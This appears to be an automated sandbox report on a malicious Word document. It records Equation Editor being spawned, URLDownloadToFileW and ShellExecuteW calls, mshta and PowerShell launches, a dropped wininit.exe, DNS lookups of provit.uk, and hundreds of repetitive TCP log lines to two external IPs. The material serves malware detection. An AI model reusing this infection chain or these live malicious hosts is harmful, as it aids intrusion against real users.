                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 66.63.187.231 Port: 80Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exeJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49164 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.168.2.22:49166 -> 198.244.140.41:443 version: TLS 1.2
                Source: Binary string: p7C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.pdb source: powershell.exe, 0000000A.00000002.415492102.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.415492102.00000000020CA000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 18_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,18_2_00403D74

                Software Vulnerabilities

                barindex
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_035F059C ShellExecuteW,ExitProcess,8_2_035F059C
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_035F0499 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,8_2_035F0499
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_035F056E URLDownloadToFileW,ShellExecuteW,ExitProcess,8_2_035F056E
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_035F039A ExitProcess,8_2_035F039A
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_035F0587 ShellExecuteW,ExitProcess,8_2_035F0587
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_035F05C1 ExitProcess,8_2_035F05C1
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_035F04B3 URLDownloadToFileW,ShellExecuteW,ExitProcess,8_2_035F04B3
                Source: global trafficDNS query: name: provit.uk
                Source: global trafficDNS query: name: provit.uk
                Source: global trafficDNS query: name: provit.uk
                Source: global trafficDNS query: name: provit.uk
                Source: global trafficDNS query: name: provit.uk
                Source: global trafficDNS query: name: provit.uk
                Source: global trafficDNS query: name: provit.uk
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
